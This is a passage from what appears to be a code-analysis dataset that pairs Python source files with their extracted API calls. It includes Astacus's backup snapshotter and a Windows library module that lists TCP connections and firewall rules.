(['question_id[0]', 'asked_about_id[0]'], {}), '(question_id[0], asked_about_id[0])\n', (6745, 6780), True, 'import datab.social_database as db\n'), ((6790, 6901), 'datab.social_database.exec_query', 'db.exec_query', (['"""UPDATE quiz_question SET correct_answer_id=%s WHERE id = %s"""', '[answer_id, quiz_question_id]'], {}), "('UPDATE quiz_question SET correct_answer_id=%s WHERE id = %s',\n [answer_id, quiz_question_id])\n", (6803, 6901), True, 'import datab.social_database as db\n'), ((7286, 7309), 'random.shuffle', 'random.shuffle', (['answers'], {}), '(answers)\n', (7300, 7309), False, 'import random\n'), ((7556, 7726), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT id FROM quiz_question WHERE asked_user_id = %s AND about_user_id = %s 
AND question_id = %s"""', '[user_id, asked_about_id[0], question_id[0]]'], {}), "(\n 'SELECT id FROM quiz_question WHERE asked_user_id = %s AND about_user_id = %s AND question_id = %s'\n , [user_id, asked_about_id[0], question_id[0]])\n", (7569, 7726), True, 'import datab.social_database as db\n'), ((7869, 7958), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT q.question FROM question q WHERE q.id = %s"""', '[question_id[0]]'], {}), "('SELECT q.question FROM question q WHERE q.id = %s', [\n question_id[0]])\n", (7882, 7958), True, 'import datab.social_database as db\n'), ((8104, 8183), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT u.email FROM users u WHERE u.id=%s"""', '[asked_about_id[0]]'], {}), "('SELECT u.email FROM users u WHERE u.id=%s', [asked_about_id[0]])\n", (8117, 8183), True, 'import datab.social_database as db\n'), ((8413, 8504), 'json.dumps', 'json.dumps', (["{'id': quiz_question_id, 'question': question_text, 'answers': answer_json}"], {}), "({'id': quiz_question_id, 'question': question_text, 'answers':\n answer_json})\n", (8423, 8504), False, 'import json\n'), ((8579, 8654), 'json.dumps', 'json.dumps', (["{'error': 'Not available questions for this user in this room'}"], {}), "({'error': 'Not available questions for this user in this room'})\n", (8589, 8654), False, 'import json\n'), ((9478, 9524), 'json.dumps', 'json.dumps', (["{'error': 'Internal server error'}"], {}), "({'error': 'Internal server error'})\n", (9488, 9524), False, 'import json\n'), ((2761, 2853), 'datab.social_database.exec_query', 'db.exec_query', (['"""INSERT INTO question (room_id, question) VALUES (%s, %s)"""', '[room_id, q]'], {}), "('INSERT INTO question (room_id, question) VALUES (%s, %s)', [\n room_id, q])\n", (2774, 2853), True, 'import datab.social_database as db\n'), ((5128, 5166), 'json.dumps', 'json.dumps', (["{'error': 'no JSON found'}"], {}), "({'error': 'no JSON found'})\n", (5138, 5166), False, 'import json\n'), ((6073, 6109), 'random.sample', 'random.sample', (['possible_questions', '(1)'], {}), '(possible_questions, 1)\n', (6086, 6109), False, 'import random\n'), ((6371, 6410), 'random.sample', 'random.sample', (['possible_users_to_ask', '(1)'], {}), '(possible_users_to_ask, 1)\n', (6384, 6410), False, 'import random\n'), ((7114, 7159), 'datab.social_database.get_answer', 'db.get_answer', (['question_id[0]', 'other_users[i]'], {}), '(question_id[0], other_users[i])\n', (7127, 7159), True, 'import datab.social_database as db\n')] |
"""
Copyright (c) 2020 Aiven Ltd
See LICENSE for details
"""
from astacus.common import magic, utils
from astacus.common.ipc import SnapshotFile, SnapshotHash, SnapshotState
from astacus.common.progress import increase_worth_reporting, Progress
from pathlib import Path
from typing import Optional
import base64
import hashlib
import logging
import os
import threading
logger = logging.getLogger(__name__)
_hash = hashlib.blake2s
def hash_hexdigest_readable(f, *, read_buffer=1_000_000):
h = _hash()
while True:
data = f.read(read_buffer)
if not data:
break
h.update(data)
return h.hexdigest()
class Snapshotter:
"""Snapshotter keeps track of files on disk, and their hashes.
The hash on disk MAY change, which may require subsequent
    incremental snapshot and/or ignoring the files which have changed.
    The output to the outside is just the root object's hash, as well as the
    list of other hashes which correspond to files referred to within the
    file list contained in the root object.
Note that any call to public API MUST be made with
    snapshotter.lock held. This is because Snapshotter is a process-wide
utility that is shared across operations, possibly used from
multiple threads, and the single-operation-only mode of operation
is not exactly flawless (the 'new operation can be started with
    old running' is an intentional feature but the new operation should
eventually replace the old). The lock itself might not need to be
built-in to Snapshotter, but having it there enables asserting its
state during public API calls.
"""
def __init__(self, *, src, dst, globs, parallel):
assert globs # model has empty; either plugin or configuration must supply them
self.src = Path(src)
self.dst = Path(dst)
self.globs = globs
self.relative_path_to_snapshotfile = {}
self.hexdigest_to_snapshotfiles = {}
self.parallel = parallel
self.lock = threading.Lock()
def _list_files(self, basepath: Path):
result_files = set()
for glob in self.globs:
for path in basepath.glob(glob):
if not path.is_file() or path.is_symlink():
continue
relpath = path.relative_to(basepath)
for parent in relpath.parents:
if parent.name == magic.ASTACUS_TMPDIR:
break
else:
result_files.add(relpath)
return sorted(result_files)
def _list_dirs_and_files(self, basepath: Path):
files = self._list_files(basepath)
dirs = {p.parent for p in files}
return sorted(dirs), files
def _add_snapshotfile(self, snapshotfile: SnapshotFile):
old_snapshotfile = self.relative_path_to_snapshotfile.get(snapshotfile.relative_path, None)
if old_snapshotfile:
self._remove_snapshotfile(old_snapshotfile)
self.relative_path_to_snapshotfile[snapshotfile.relative_path] = snapshotfile
if snapshotfile.hexdigest:
self.hexdigest_to_snapshotfiles.setdefault(snapshotfile.hexdigest, []).append(snapshotfile)
def _remove_snapshotfile(self, snapshotfile: SnapshotFile):
assert self.relative_path_to_snapshotfile[snapshotfile.relative_path] == snapshotfile
del self.relative_path_to_snapshotfile[snapshotfile.relative_path]
if snapshotfile.hexdigest:
self.hexdigest_to_snapshotfiles[snapshotfile.hexdigest].remove(snapshotfile)
def _snapshotfile_from_path(self, relative_path):
src_path = self.src / relative_path
st = src_path.stat()
return SnapshotFile(relative_path=relative_path, mtime_ns=st.st_mtime_ns, file_size=st.st_size)
def _get_snapshot_hash_list(self, relative_paths):
same = 0
lost = 0
for relative_path in relative_paths:
old_snapshotfile = self.relative_path_to_snapshotfile.get(relative_path)
try:
snapshotfile = self._snapshotfile_from_path(relative_path)
except FileNotFoundError:
lost += 1
if increase_worth_reporting(lost):
logger.debug("#%d. lost - %s disappeared before stat, ignoring", lost, self.src / relative_path)
continue
if old_snapshotfile:
snapshotfile.hexdigest = old_snapshotfile.hexdigest
snapshotfile.content_b64 = old_snapshotfile.content_b64
if old_snapshotfile == snapshotfile:
same += 1
if increase_worth_reporting(same):
logger.debug("#%d. same - %r in %s is same", same, old_snapshotfile, relative_path)
continue
yield snapshotfile
def get_snapshot_hashes(self):
assert self.lock.locked()
return [
SnapshotHash(hexdigest=dig, size=sf[0].file_size) for dig, sf in self.hexdigest_to_snapshotfiles.items() if sf
]
def get_snapshot_state(self):
assert self.lock.locked()
return SnapshotState(root_globs=self.globs, files=sorted(self.relative_path_to_snapshotfile.values()))
def _snapshot_create_missing_directories(self, *, src_dirs, dst_dirs):
changes = 0
for i, relative_dir in enumerate(set(src_dirs).difference(dst_dirs), 1):
dst_path = self.dst / relative_dir
dst_path.mkdir(parents=True, exist_ok=True)
if increase_worth_reporting(i):
logger.debug("#%d. new directory: %r", i, relative_dir)
changes += 1
return changes
def _snapshot_remove_extra_files(self, *, src_files, dst_files):
changes = 0
for i, relative_path in enumerate(set(dst_files).difference(src_files), 1):
dst_path = self.dst / relative_path
snapshotfile = self.relative_path_to_snapshotfile.get(relative_path)
if snapshotfile:
self._remove_snapshotfile(snapshotfile)
dst_path.unlink()
if increase_worth_reporting(i):
logger.debug("#%d. extra file: %r", i, relative_path)
changes += 1
return changes
def _snapshot_add_missing_files(self, *, src_files, dst_files):
existing = 0
disappeared = 0
changes = 0
for i, relative_path in enumerate(set(src_files).difference(dst_files), 1):
src_path = self.src / relative_path
dst_path = self.dst / relative_path
try:
os.link(src=src_path, dst=dst_path, follow_symlinks=False)
except FileExistsError:
# This happens only if snapshot is started twice at
# same time. While it is technically speaking upstream
# error, we rather handle it here than leave
# exceptions not handled.
existing += 1
if increase_worth_reporting(existing):
logger.debug("#%d. %s already existed, ignoring", existing, src_path)
continue
except FileNotFoundError:
disappeared += 1
if increase_worth_reporting(disappeared):
logger.debug("#%d. %s disappeared before linking, ignoring", disappeared, src_path)
continue
if increase_worth_reporting(i - disappeared):
logger.debug("#%d. new file: %r", i - disappeared, relative_path)
changes += 1
return changes
def snapshot(self, *, progress: Optional[Progress] = None):
assert self.lock.locked()
if progress is None:
progress = Progress()
src_dirs, src_files = self._list_dirs_and_files(self.src)
progress.start(1)
if self.src == self.dst:
# The src=dst mode should be used if and only if it is
# known that files will not disappear between snapshot and
# upload steps (e.g. Astacus controls the lifecycle of the
# files within). In that case, there is little point in
# making extra symlinks and we can just use the src
# directory contents as-is.
dst_dirs, dst_files = src_dirs, src_files
else:
progress.add_total(3)
dst_dirs, dst_files = self._list_dirs_and_files(self.dst)
# Create missing directories
changes = self._snapshot_create_missing_directories(src_dirs=src_dirs, dst_dirs=dst_dirs)
progress.add_success()
# Remove extra files
changes += self._snapshot_remove_extra_files(src_files=src_files, dst_files=dst_files)
progress.add_success()
# Add missing files
changes += self._snapshot_add_missing_files(src_files=src_files, dst_files=dst_files)
progress.add_success()
# We COULD also remove extra directories, but it is not
# probably really worth it and due to ignored files it
# actually might not even work.
# Then, create/update corresponding snapshotfile objects (old
# ones were already removed)
dst_dirs, dst_files = self._list_dirs_and_files(self.dst)
snapshotfiles = list(self._get_snapshot_hash_list(dst_files))
progress.add_total(len(snapshotfiles))
def _cb(snapshotfile):
# src may or may not be present; dst is present as it is in snapshot
with snapshotfile.open_for_reading(self.dst) as f:
if snapshotfile.file_size <= magic.EMBEDDED_FILE_SIZE:
snapshotfile.content_b64 = base64.b64encode(f.read()).decode()
else:
snapshotfile.hexdigest = hash_hexdigest_readable(f)
return snapshotfile
def _result_cb(*, map_in, map_out):
self._add_snapshotfile(map_out)
progress.add_success()
return True
changes += len(snapshotfiles)
utils.parallel_map_to(iterable=snapshotfiles, fun=_cb, result_callback=_result_cb, n=self.parallel)
# We initially started with 1 extra
progress.add_success()
return changes
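
# Illustrative usage sketch (not part of the original module). The instance
# name `snapshotter` is hypothetical; its constructor is defined earlier in
# the file, so only the calls shown above are assumed here:
#
#     with snapshotter.lock:
#         changes = snapshotter.snapshot(progress=Progress())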
| [
"logging.getLogger",
"astacus.common.progress.increase_worth_reporting",
"os.link",
"pathlib.Path",
"threading.Lock",
"astacus.common.utils.parallel_map_to",
"astacus.common.ipc.SnapshotFile",
"astacus.common.ipc.SnapshotHash",
"astacus.common.progress.Progress"
] | [((383, 410), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (400, 410), False, 'import logging\n'), ((1794, 1803), 'pathlib.Path', 'Path', (['src'], {}), '(src)\n', (1798, 1803), False, 'from pathlib import Path\n'), ((1823, 1832), 'pathlib.Path', 'Path', (['dst'], {}), '(dst)\n', (1827, 1832), False, 'from pathlib import Path\n'), ((2006, 2022), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (2020, 2022), False, 'import threading\n'), ((3701, 3793), 'astacus.common.ipc.SnapshotFile', 'SnapshotFile', ([], {'relative_path': 'relative_path', 'mtime_ns': 'st.st_mtime_ns', 'file_size': 'st.st_size'}), '(relative_path=relative_path, mtime_ns=st.st_mtime_ns,\n file_size=st.st_size)\n', (3713, 3793), False, 'from astacus.common.ipc import SnapshotFile, SnapshotHash, SnapshotState\n'), ((10082, 10186), 'astacus.common.utils.parallel_map_to', 'utils.parallel_map_to', ([], {'iterable': 'snapshotfiles', 'fun': '_cb', 'result_callback': '_result_cb', 'n': 'self.parallel'}), '(iterable=snapshotfiles, fun=_cb, result_callback=\n _result_cb, n=self.parallel)\n', (10103, 10186), False, 'from astacus.common import magic, utils\n'), ((4937, 4986), 'astacus.common.ipc.SnapshotHash', 'SnapshotHash', ([], {'hexdigest': 'dig', 'size': 'sf[0].file_size'}), '(hexdigest=dig, size=sf[0].file_size)\n', (4949, 4986), False, 'from astacus.common.ipc import SnapshotFile, SnapshotHash, SnapshotState\n'), ((5533, 5560), 'astacus.common.progress.increase_worth_reporting', 'increase_worth_reporting', (['i'], {}), '(i)\n', (5557, 5560), False, 'from astacus.common.progress import increase_worth_reporting, Progress\n'), ((6115, 6142), 'astacus.common.progress.increase_worth_reporting', 'increase_worth_reporting', (['i'], {}), '(i)\n', (6139, 6142), False, 'from astacus.common.progress import increase_worth_reporting, Progress\n'), ((7419, 7460), 'astacus.common.progress.increase_worth_reporting', 'increase_worth_reporting', (['(i - disappeared)'], {}), '(i - disappeared)\n', (7443, 7460), False, 'from astacus.common.progress import increase_worth_reporting, Progress\n'), ((7744, 7754), 'astacus.common.progress.Progress', 'Progress', ([], {}), '()\n', (7752, 7754), False, 'from astacus.common.progress import increase_worth_reporting, Progress\n'), ((6609, 6667), 'os.link', 'os.link', ([], {'src': 'src_path', 'dst': 'dst_path', 'follow_symlinks': '(False)'}), '(src=src_path, dst=dst_path, follow_symlinks=False)\n', (6616, 6667), False, 'import os\n'), ((4185, 4215), 'astacus.common.progress.increase_worth_reporting', 'increase_worth_reporting', (['lost'], {}), '(lost)\n', (4209, 4215), False, 'from astacus.common.progress import increase_worth_reporting, Progress\n'), ((4638, 4668), 'astacus.common.progress.increase_worth_reporting', 'increase_worth_reporting', (['same'], {}), '(same)\n', (4662, 4668), False, 'from astacus.common.progress import increase_worth_reporting, Progress\n'), ((6995, 7029), 'astacus.common.progress.increase_worth_reporting', 'increase_worth_reporting', (['existing'], {}), '(existing)\n', (7019, 7029), False, 'from astacus.common.progress import increase_worth_reporting, Progress\n'), ((7236, 7273), 'astacus.common.progress.increase_worth_reporting', 'increase_worth_reporting', (['disappeared'], {}), '(disappeared)\n', (7260, 7273), False, 'from astacus.common.progress import increase_worth_reporting, Progress\n')] |
import windows
import ctypes
import socket
import struct
from windows import winproxy
import windows.generated_def as gdef
from windows.com import interfaces as cominterfaces
from windows.generated_def.winstructs import *
from windows.generated_def.windef import *
class TCP4Connection(MIB_TCPROW_OWNER_PID):
"""A TCP4 socket (connected or listening)"""
@property
def established(self):
"""``True`` if connection is established else it's a listening socket"""
return self.dwState == MIB_TCP_STATE_ESTAB
@property
def remote_port(self):
""":type: :class:`int`"""
if not self.established:
return None
return socket.ntohs(self.dwRemotePort)
@property
def local_port(self):
""":type: :class:`int`"""
return socket.ntohs(self.dwLocalPort)
@property
def local_addr(self):
"""Local address IP (x.x.x.x)
:type: :class:`str`"""
return socket.inet_ntoa(struct.pack("<I", self.dwLocalAddr))
@property
def remote_addr(self):
"""remote address IP (x.x.x.x)
:type: :class:`str`"""
if not self.established:
return None
return socket.inet_ntoa(struct.pack("<I", self.dwRemoteAddr))
@property
def remote_proto(self):
"""Identification of the protocol associated with the remote port.
Equals ``remote_port`` if no protocol is associated with it.
:type: :class:`str` or :class:`int`
"""
try:
return socket.getservbyport(self.remote_port, 'tcp')
except socket.error:
return self.remote_port
@property
def remote_host(self):
"""Identification of the remote hostname.
Equals ``remote_addr`` if the resolution fails
:type: :class:`str` or :class:`int`
"""
try:
return socket.gethostbyaddr(self.remote_addr)
except socket.error:
return self.remote_addr
def close(self):
"""Close the connection <require elevated process>"""
closing = MIB_TCPROW()
closing.dwState = MIB_TCP_STATE_DELETE_TCB
closing.dwLocalAddr = self.dwLocalAddr
closing.dwLocalPort = self.dwLocalPort
closing.dwRemoteAddr = self.dwRemoteAddr
closing.dwRemotePort = self.dwRemotePort
return winproxy.SetTcpEntry(ctypes.byref(closing))
def __repr__(self):
if not self.established:
return "<TCP IPV4 Listening socket on {0}:{1}>".format(self.local_addr, self.local_port)
return "<TCP IPV4 Connection {s.local_addr}:{s.local_port} -> {s.remote_addr}:{s.remote_port}>".format(s=self)
class TCP6Connection(MIB_TCP6ROW_OWNER_PID):
"""A TCP6 socket (connected or listening)"""
@staticmethod
def _str_ipv6_addr(addr):
return ":".join(c.encode('hex') for c in addr)
@property
def established(self):
"""``True`` if connection is established else it's a listening socket"""
return self.dwState == MIB_TCP_STATE_ESTAB
@property
def remote_port(self):
""":type: :class:`int`"""
if not self.established:
return None
return socket.ntohs(self.dwRemotePort)
@property
def local_port(self):
""":type: :class:`int`"""
return socket.ntohs(self.dwLocalPort)
@property
def local_addr(self):
"""Local address IP
:type: :class:`str`"""
return self._str_ipv6_addr(self.ucLocalAddr)
@property
def remote_addr(self):
"""remote address IP
:type: :class:`str`"""
if not self.established:
return None
return self._str_ipv6_addr(self.ucRemoteAddr)
@property
def remote_proto(self):
"""Equals to ``self.remote_port`` for Ipv6"""
return self.remote_port
@property
def remote_host(self):
"""Equals to ``self.remote_addr`` for Ipv6"""
return self.remote_addr
def close(self):
raise NotImplementedError("Closing IPV6 connection non implemented")
def __repr__(self):
if not self.established:
return "<TCP IPV6 Listening socket on {0}:{1}>".format(self.local_addr, self.local_port)
return "<TCP IPV6 Connection {0}:{1} -> {2}:{3}>".format(self.local_addr, self.local_port, self.remote_addr, self.remote_port)
def get_MIB_TCPTABLE_OWNER_PID_from_buffer(buffer):
x = windows.generated_def.winstructs.MIB_TCPTABLE_OWNER_PID.from_buffer(buffer)
nb_entry = x.dwNumEntries
class _GENERATED_MIB_TCPTABLE_OWNER_PID(ctypes.Structure):
_fields_ = [
("dwNumEntries", DWORD),
("table", TCP4Connection * nb_entry),
]
return _GENERATED_MIB_TCPTABLE_OWNER_PID.from_buffer(buffer)
def get_MIB_TCP6TABLE_OWNER_PID_from_buffer(buffer):
x = windows.generated_def.winstructs.MIB_TCP6TABLE_OWNER_PID.from_buffer(buffer)
nb_entry = x.dwNumEntries
# Struct _MIB_TCP6TABLE_OWNER_PID definitions
class _GENERATED_MIB_TCP6TABLE_OWNER_PID(Structure):
_fields_ = [
("dwNumEntries", DWORD),
("table", TCP6Connection * nb_entry),
]
return _GENERATED_MIB_TCP6TABLE_OWNER_PID.from_buffer(buffer)
class Firewall(cominterfaces.INetFwPolicy2):
"""The windows firewall"""
@property
def rules(self):
"""The rules of the firewall
:type: [:class:`FirewallRule`] -- A list of rule
"""
ifw_rules = cominterfaces.INetFwRules()
self.get_Rules(ifw_rules)
nb_rules = gdef.LONG()
ifw_rules.get_Count(nb_rules)
unknw = cominterfaces.IUnknown()
ifw_rules.get__NewEnum(unknw)
pVariant = cominterfaces.IEnumVARIANT()
unknw.QueryInterface(pVariant.IID, pVariant)
count = gdef.ULONG()
var = windows.com.ImprovedVariant()
rules = []
for i in range(nb_rules.value):
pVariant.Next(1, var, count)
if not count.value:
break
rule = FirewallRule()
idisp = var.asdispatch
idisp.QueryInterface(rule.IID, rule)
rules.append(rule)
return rules
@property
def current_profile_types(self):
"""Mask of the profiles currently enabled
:type: :class:`long`
"""
cpt = gdef.LONG()
self.get_CurrentProfileTypes(cpt)
return cpt.value
@property
def enabled(self):
"""A maping of the active firewall profiles
{
``NET_FW_PROFILE_TYPE2_.NET_FW_PROFILE2_DOMAIN(0x1L)``: ``True`` or ``False``,
``NET_FW_PROFILE_TYPE2_.NET_FW_PROFILE2_PRIVATE(0x2L)``: ``True`` or ``False``,
``NET_FW_PROFILE_TYPE2_.NET_FW_PROFILE2_PUBLIC(0x4L)``: ``True`` or ``False``,
}
:type: :class:`dict`
"""
profiles = [gdef.NET_FW_PROFILE2_DOMAIN, gdef.NET_FW_PROFILE2_PRIVATE, gdef.NET_FW_PROFILE2_PUBLIC]
return {prof: self.enabled_for_profile_type(prof) for prof in profiles}
def enabled_for_profile_type(self, profile_type):
enabled = gdef.VARIANT_BOOL()
self.get_FirewallEnabled(profile_type, enabled)
return enabled.value
class FirewallRule(cominterfaces.INetFwRule):
"""A rule of the firewall"""
@property
def name(self):
"""Name of the rule
:type: :class:`unicode`
"""
name = gdef.BSTR()
self.get_Name(name)
return name.value
@property
def description(self):
"""Description of the rule
:type: :class:`unicode`
"""
description = gdef.BSTR()
self.get_Description(description)
return description.value
@property
def application_name(self):
"""Name of the application to which apply the rule
:type: :class:`unicode`
"""
applicationname = gdef.BSTR()
self.get_ApplicationName(applicationname)
return applicationname.value
@property
def service_name(self):
"""Name of the service to which apply the rule
:type: :class:`unicode`
"""
servicename = gdef.BSTR()
self.get_ServiceName(servicename)
return servicename.value
@property
def protocol(self):
"""Protocol to which apply the rule
:type: :class:`long`
"""
protocol = gdef.LONG()
self.get_Protocol(protocol)
return protocol.value
@property
def local_address(self):
"""Local address of the rule
:type: :class:`unicode`
"""
local_address = gdef.BSTR()
self.get_LocalAddresses(local_address)
return local_address.value
@property
def remote_address(self):
"""Remote address of the rule
:type: :class:`unicode`
"""
remote_address = gdef.BSTR()
self.get_RemoteAddresses(remote_address)
return remote_address.value
@property
def direction(self):
"""Direction of the rule, values might be:
* ``NET_FW_RULE_DIRECTION_.NET_FW_RULE_DIR_IN(0x1L)``
* ``NET_FW_RULE_DIRECTION_.NET_FW_RULE_DIR_OUT(0x2L)``
subclass of :class:`long`
"""
direction = gdef.NET_FW_RULE_DIRECTION()
self.get_Direction(direction)
return direction.value
@property
def interface_types(self):
"""Types of interface of the rule
:type: :class:`unicode`
"""
interface_type = gdef.BSTR()
self.get_InterfaceTypes(interface_type)
return interface_type.value
@property
def local_port(self):
"""Local port of the rule
:type: :class:`unicode`
"""
local_port = gdef.BSTR()
self.get_LocalPorts(local_port)
return local_port.value
@property
def remote_port(self):
"""Remote port of the rule
:type: :class:`unicode`
"""
remote_port = gdef.BSTR()
self.get_RemotePorts(remote_port)
return remote_port.value
@property
def action(self):
"""Action of the rule, values might be:
* ``NET_FW_ACTION_.NET_FW_ACTION_BLOCK(0x0L)``
* ``NET_FW_ACTION_.NET_FW_ACTION_ALLOW(0x1L)``
subclass of :class:`long`
"""
action = gdef.NET_FW_ACTION()
self.get_Action(action)
return action.value
@property
def enabled(self):
"""``True`` if rule is enabled"""
enabled = gdef.VARIANT_BOOL()
self.get_Enabled(enabled)
return enabled.value
@property
def grouping(self):
"""Grouping of the rule
:type: :class:`unicode`
"""
grouping = gdef.BSTR()
self.get_RemotePorts(grouping)
return grouping.value
@property
def icmp_type_and_code(self):
icmp_type_and_code = gdef.BSTR()
self.get_RemotePorts(icmp_type_and_code)
return icmp_type_and_code.value
def __repr__(self):
return u'<{0} "{1}">'.format(type(self).__name__, self.name).encode("ascii", errors='backslashreplace')
class Network(object):
NetFwPolicy2 = windows.com.IID.from_string("E2B3C97F-6AE1-41AC-817A-F6F92166D7DD")
@property
def firewall(self):
"""The firewall of the system
:type: :class:`Firewall`
"""
windows.com.init()
firewall = Firewall()
windows.com.create_instance(self.NetFwPolicy2, firewall)
return firewall
@staticmethod
def _get_tcp_ipv4_sockets():
size = ctypes.c_uint(0)
try:
winproxy.GetExtendedTcpTable(None, ctypes.byref(size), ulAf=AF_INET)
except winproxy.IphlpapiError:
pass # Allow us to set size to the needed value
buffer = (ctypes.c_char * size.value)()
winproxy.GetExtendedTcpTable(buffer, ctypes.byref(size), ulAf=AF_INET)
t = get_MIB_TCPTABLE_OWNER_PID_from_buffer(buffer)
return list(t.table)
@staticmethod
def _get_tcp_ipv6_sockets():
size = ctypes.c_uint(0)
try:
winproxy.GetExtendedTcpTable(None, ctypes.byref(size), ulAf=AF_INET6)
except winproxy.IphlpapiError:
pass # Allow us to set size to the needed value
buffer = (ctypes.c_char * size.value)()
winproxy.GetExtendedTcpTable(buffer, ctypes.byref(size), ulAf=AF_INET6)
t = get_MIB_TCP6TABLE_OWNER_PID_from_buffer(buffer)
return list(t.table)
ipv4 = property(lambda self: self._get_tcp_ipv4_sockets())
"""List of TCP IPv4 socket (connection and listening)
:type: [:class:`TCP4Connection`]"""
ipv6 = property(lambda self: self._get_tcp_ipv6_sockets())
"""List of TCP IPv6 socket (connection and listening)
:type: [:class:`TCP6Connection`]
"""
| [
"windows.com.interfaces.IEnumVARIANT",
"windows.generated_def.ULONG",
"windows.generated_def.VARIANT_BOOL",
"windows.com.init",
"windows.generated_def.winstructs.MIB_TCP6TABLE_OWNER_PID.from_buffer",
"windows.generated_def.LONG",
"windows.com.interfaces.IUnknown",
"windows.com.create_instance",
"ctypes.c_uint",
"windows.com.ImprovedVariant",
"windows.com.IID.from_string",
"windows.generated_def.NET_FW_ACTION",
"windows.generated_def.BSTR",
"struct.pack",
"socket.gethostbyaddr",
"socket.ntohs",
"windows.generated_def.NET_FW_RULE_DIRECTION",
"windows.generated_def.winstructs.MIB_TCPTABLE_OWNER_PID.from_buffer",
"ctypes.byref",
"socket.getservbyport",
"windows.com.interfaces.INetFwRules"
] | [((4444, 4519), 'windows.generated_def.winstructs.MIB_TCPTABLE_OWNER_PID.from_buffer', 'windows.generated_def.winstructs.MIB_TCPTABLE_OWNER_PID.from_buffer', (['buffer'], {}), '(buffer)\n', (4511, 4519), False, 'import windows\n'), ((4877, 4953), 'windows.generated_def.winstructs.MIB_TCP6TABLE_OWNER_PID.from_buffer', 'windows.generated_def.winstructs.MIB_TCP6TABLE_OWNER_PID.from_buffer', (['buffer'], {}), '(buffer)\n', (4945, 4953), False, 'import windows\n'), ((11219, 11286), 'windows.com.IID.from_string', 'windows.com.IID.from_string', (['"""E2B3C97F-6AE1-41AC-817A-F6F92166D7DD"""'], {}), "('E2B3C97F-6AE1-41AC-817A-F6F92166D7DD')\n", (11246, 11286), False, 'import windows\n'), ((682, 713), 'socket.ntohs', 'socket.ntohs', (['self.dwRemotePort'], {}), '(self.dwRemotePort)\n', (694, 713), False, 'import socket\n'), ((804, 834), 'socket.ntohs', 'socket.ntohs', (['self.dwLocalPort'], {}), '(self.dwLocalPort)\n', (816, 834), False, 'import socket\n'), ((3211, 3242), 'socket.ntohs', 'socket.ntohs', (['self.dwRemotePort'], {}), '(self.dwRemotePort)\n', (3223, 3242), False, 'import socket\n'), ((3333, 3363), 'socket.ntohs', 'socket.ntohs', (['self.dwLocalPort'], {}), '(self.dwLocalPort)\n', (3345, 3363), False, 'import socket\n'), ((5532, 5559), 'windows.com.interfaces.INetFwRules', 'cominterfaces.INetFwRules', ([], {}), '()\n', (5557, 5559), True, 'from windows.com import interfaces as cominterfaces\n'), ((5614, 5625), 'windows.generated_def.LONG', 'gdef.LONG', ([], {}), '()\n', (5623, 5625), True, 'import windows.generated_def as gdef\n'), ((5681, 5705), 'windows.com.interfaces.IUnknown', 'cominterfaces.IUnknown', ([], {}), '()\n', (5703, 5705), True, 'from windows.com import interfaces as cominterfaces\n'), ((5764, 5792), 'windows.com.interfaces.IEnumVARIANT', 'cominterfaces.IEnumVARIANT', ([], {}), '()\n', (5790, 5792), True, 'from windows.com import interfaces as cominterfaces\n'), ((5863, 5875), 'windows.generated_def.ULONG', 'gdef.ULONG', ([], {}), '()\n', (5873, 5875), True, 'import windows.generated_def as gdef\n'), ((5890, 5919), 'windows.com.ImprovedVariant', 'windows.com.ImprovedVariant', ([], {}), '()\n', (5917, 5919), False, 'import windows\n'), ((6403, 6414), 'windows.generated_def.LONG', 'gdef.LONG', ([], {}), '()\n', (6412, 6414), True, 'import windows.generated_def as gdef\n'), ((7164, 7183), 'windows.generated_def.VARIANT_BOOL', 'gdef.VARIANT_BOOL', ([], {}), '()\n', (7181, 7183), True, 'import windows.generated_def as gdef\n'), ((7473, 7484), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (7482, 7484), True, 'import windows.generated_def as gdef\n'), ((7683, 7694), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (7692, 7694), True, 'import windows.generated_def as gdef\n'), ((7947, 7958), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (7956, 7958), True, 'import windows.generated_def as gdef\n'), ((8211, 8222), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (8220, 8222), True, 'import windows.generated_def as gdef\n'), ((8442, 8453), 'windows.generated_def.LONG', 'gdef.LONG', ([], {}), '()\n', (8451, 8453), True, 'import windows.generated_def as gdef\n'), ((8670, 8681), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (8679, 8681), True, 'import windows.generated_def as gdef\n'), ((8917, 8928), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (8926, 8928), True, 'import windows.generated_def as gdef\n'), ((9306, 9334), 'windows.generated_def.NET_FW_RULE_DIRECTION', 'gdef.NET_FW_RULE_DIRECTION', 
([], {}), '()\n', (9332, 9334), True, 'import windows.generated_def as gdef\n'), ((9562, 9573), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (9571, 9573), True, 'import windows.generated_def as gdef\n'), ((9799, 9810), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (9808, 9810), True, 'import windows.generated_def as gdef\n'), ((10027, 10038), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (10036, 10038), True, 'import windows.generated_def as gdef\n'), ((10382, 10402), 'windows.generated_def.NET_FW_ACTION', 'gdef.NET_FW_ACTION', ([], {}), '()\n', (10400, 10402), True, 'import windows.generated_def as gdef\n'), ((10561, 10580), 'windows.generated_def.VARIANT_BOOL', 'gdef.VARIANT_BOOL', ([], {}), '()\n', (10578, 10580), True, 'import windows.generated_def as gdef\n'), ((10779, 10790), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (10788, 10790), True, 'import windows.generated_def as gdef\n'), ((10938, 10949), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (10947, 10949), True, 'import windows.generated_def as gdef\n'), ((11418, 11436), 'windows.com.init', 'windows.com.init', ([], {}), '()\n', (11434, 11436), False, 'import windows\n'), ((11475, 11531), 'windows.com.create_instance', 'windows.com.create_instance', (['self.NetFwPolicy2', 'firewall'], {}), '(self.NetFwPolicy2, firewall)\n', (11502, 11531), False, 'import windows\n'), ((11623, 11639), 'ctypes.c_uint', 'ctypes.c_uint', (['(0)'], {}), '(0)\n', (11636, 11639), 